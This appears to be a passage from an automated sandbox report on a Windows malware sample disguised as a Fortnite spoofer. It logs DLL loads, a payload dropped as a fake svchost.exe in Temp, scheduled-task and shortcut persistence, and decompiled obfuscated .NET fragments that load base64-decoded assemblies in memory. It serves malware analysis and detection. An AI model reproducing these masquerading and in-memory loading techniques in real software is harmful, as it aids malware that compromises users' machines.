                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\StartMenuExperienceHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: svchost.lnk.12.drLNK file: ..\..\..\..\..\..\Local\Temp\svchost.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: 18sFhgSyVK.exeStatic PE information: Image base 0x140000000 > 0x60000000
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: 18sFhgSyVK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb&& source: 18sFhgSyVK.exe
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb source: 18sFhgSyVK.exe
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

                            Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.tM3bvFnn6Mbt5WifsvxJGCRJaGCs9xZx7ZGfykhl,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy._3769zkLfcwVNUIC9LIejrz9yUfAKE6U1Ph3o3QGC,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.Oxyq8pdntw8n8wlgK4cC1UviEbCs6cWoFWExp6r1,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.qkxNRIW066TVI4rVu5JkoNIJP7mcZDkeuXbO8Bdo,k7DEUthG3QSrccC.xEDeLKp11QUlOfC()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[2],k7DEUthG3QSrccC.vWTlVsnh1Kh1jPA(Convert.FromBase64String(_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.tM3bvFnn6Mbt5WifsvxJGCRJaGCs9xZx7ZGfykhl,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy._3769zkLfcwVNUIC9LIejrz9yUfAKE6U1Ph3o3QGC,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.Oxyq8pdntw8n8wlgK4cC1UviEbCs6cWoFWExp6r1,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.qkxNRIW066TVI4rVu5JkoNIJP7mcZDkeuXbO8Bdo,k7DEUthG3QSrccC.xEDeLKp11QUlOfC()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[2],k7DEUthG3QSrccC.vWTlVsnh1Kh1jPA(Convert.FromBase64String(_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT System.AppDomain.Load(byte[])
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud System.AppDomain.Load(byte[])
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT System.AppDomain.Load(byte[])
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud System.AppDomain.Load(byte[])
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | .Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud
Source: StartMenuExperienceHost.exe.4.dr, YuWwnU774i1WXQz.cs | High entropy of concatenated method names: 'zoPwAT5CIxrIHgi', 'FKGpPlnraXbM1ZF', 'jXiKhZ2WRX9rqip', '_4YgkMx1W2VQBhkBo9H', 'Mtx16zRUzpofifFREl', 'vftrbwcfQzEo1ZL9A3', '_7PBY7FZQF55DjK1Cov', 'TLX2HhdljB2mEAtMSY', 'MIewFAlfiNh37TUukE', 'VlvzphW9ZDbWXg1odi'
Source: StartMenuExperienceHost.exe.4.dr, BYZXqCcInfvLxkJ.cs | High entropy of concatenated method names: 'HmYB37sUGn1tzWo', 'SwJtMaiww3xwhlt', '_2Ncrum7fWL0LZSI3UTXJdSgAbrxu50NP', 'KJck06XP8a2RC4x3RbNNtnEWeVWVU5RK', 'o2ayMkAsm2MJl7DzCGVCewxkkEXGw9pv', 'XsgoBl2zFUtxhxO7iFYbTblPAMzBMdo8'
Source: StartMenuExperienceHost.exe.4.dr, vxw6fPaLgCWKUy0.cs | High entropy of concatenated method names: 'bsRhaVEy8neLH0G', 'gQeMuKYZfmdfalx', 'a8ZGWF4Ze61pADc', 'BPZ5AL5H8T2eyhW', 'cIvhfw92JPAMmOxZlGFpa6dJWdcGwybE', 'xp2ouzuaCyVa0e3eVHsOzzb0qWY8YtLE', 'ESgVaOnZruQgSXv7dUJbyII9HmUzzpcM', 'lmYfT7g04ToPYZcDY8skWi5KCol1VIKc', 'AfqADcwUoxdRdfpzT2f6Gr6do4dtwHRR', 'WWL0XENC3bSs0kDawIY7qmuVJ47WHNcZ'
Source: StartMenuExperienceHost.exe.4.dr, 4YsgSk8wbMoiiRy.cs | High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'kaAfXKhhGgwVbpY', 'ZuyftoEJOIUteV19hRJzXvsttxsbIVQE', 'FXMAjIdHzuejPKublxja7znJenaoewZ4', 'THmHOhpw81AE8MOOZCRn7a0aYF6RPxJZ', 'PEC4vmGtLYWCB1RoZF9K5OzyWH2kigrV'
Source: StartMenuExperienceHost.exe.4.dr, RGgnftDWPPpsIjGTcvO1OpP8vWPkDEV58d5cxkAlUabCGJ3GABiiQ81jRyxmvPvrtAm4lXCj.cs | High entropy of concatenated method names: 'ORiC8emOPRQGOXpPv83ulthuW6CVQ6YM4xTAjZ2jPRAoP9wiEOfLSrtcMcVNycVBuUDSk2rB', 'AceLNnYLfssv5xNkhIBxOpI2MxBiQXzE', 'krotEk14oyz0ZE7dRR97UUit8vJqRAkB', 'kRUj6xBlZyurP2lRnqqZjyfmGywk0gbR', 'xsPGLSQ1yo77J0S7jujyES9FLI86EBg1'
Source: StartMenuExperienceHost.exe.4.dr, XqLRt2iKMxTUA2h4rXCpIUvAUqRYRR5QrACB1BMG.cs | High entropy of concatenated method names: 'l6xBdqb0bhFOmil6dHylKViFfsdgGKvRJk6esdwo', 'SNU29fbBoCjckaVAB9UgMQV0JgKVgsN6yzd6huJ3', 'qc88vInX2XwZwshFbCgXe3OVAw7r9h3qu6VvVOyz', 'Vlcok3h04GLc88cDOnru26nx5ciYbJJaxeObu95U', '_7fyohtCQd9HltSGvlCh4tY4hXjO9K4W56xjZOh0y', 'FYvEJEAauCvrzK4SAEAXEftUcg1Y3DLHHy84Q6E4', 'P8qnLG95P6quuFElwnzpmvpx1UFiMYwaN0X3Tl5f', 'TdTY4rZk0TCcYFml7X4XfCA4ztEWOTb43FyTMja1', 'Qq5pVkiqLGsEZ5anpF0Ym6XKaLY63thUytWoxwSR', 'Jfmk5g6q8jjPsHj0gP4kKAcor9y15M3BKKlOda82'
